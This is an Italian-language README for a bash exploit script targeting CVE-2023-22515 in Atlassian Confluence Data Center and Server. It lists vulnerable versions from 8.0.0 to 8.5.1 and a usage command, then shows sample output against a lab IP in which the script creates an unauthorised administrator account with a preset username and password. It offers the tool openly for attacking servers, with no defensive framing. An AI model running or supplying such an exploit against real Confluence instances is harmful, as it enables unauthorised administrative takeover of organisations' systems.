
Script Bash che sfrutta CVE-2023-22515 in Confluence Data Center e Server per creare account amministratore non autorizzati, consentendo accessi non autorizzati.
Un semplice script bash per l'exploit di CVE-2023-22515.
Le istanze Confluence Data Center e Server presentano una vulnerabilità di controllo degli accessi non corretto (CVE-2023-22515), che consente agli attaccanti di creare account amministratore Confluence non autorizzati e accedere alle istanze Confluence.
8.0.0
8.0.1
8.0.2
8.0.3
8.0.4
8.1.0
8.1.1
8.1.3
8.1.4
8.2.0
8.2.1
8.2.2
8.2.3
8.3.0
8.3.1
8.3.2
8.4.0
8.4.1
8.4.2
8.5.0
8.5.1
./xpl.sh [URL]
└─$ ./xpl.sh http://10.10.76.38:8090
[INFO] Verifica se l'host è vulnerabile...
Vulnerabile --> Codice di risposta: 200
[+] Sfruttamento del target...
[+] Exploit completato!!!
[INFO] Utente creato: a123456
[INFO] Password creata: ChangeMe123